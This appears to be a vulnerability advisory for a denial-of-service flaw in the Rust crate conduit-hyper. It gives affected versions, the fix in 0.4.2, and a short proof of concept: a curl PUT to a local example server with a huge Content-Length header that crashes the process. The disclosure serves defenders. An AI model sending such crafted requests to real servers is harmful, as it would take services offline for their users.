JFrog Security Research

- conduit-hyper missing request size limit DoS

CVE-2022-39294 | CVSS 7.5

JFrog Severity:high

Published 1 Nov. 2022 | Last updated 1 Nov. 2022

A missing request size limit for HTTP requests in conduit-hyper can allow network attackers to perform denial of service

conduit-hyper

[0.2.0-alpha.3, 0.4.2), fixed in 0.4.2

conduit-hyper would not, by default, set a limit for the size of the request body. That meant if a malicious peer would send a request with a very large Content-Length header (even if the body itself is not very large), the Rust allocator would panic (due to a failed allocation) and the process would crash.

git clone https://github.com/conduit-rust/conduit-hyper

cd conduit-hyper && cargo run --example server

curl -v -X PUT "http://127.0.0.1:12345/" --data `python3 -c
"import sys; sys.stdout.write('a'*10000)"` -H
"Content-Length: 11111111111111111111"

No mitigations are provided for this vulnerability.

In order to fully fix this vulnerability, we recommend upgrading conduit-hyper to version 0.4.2

GHSA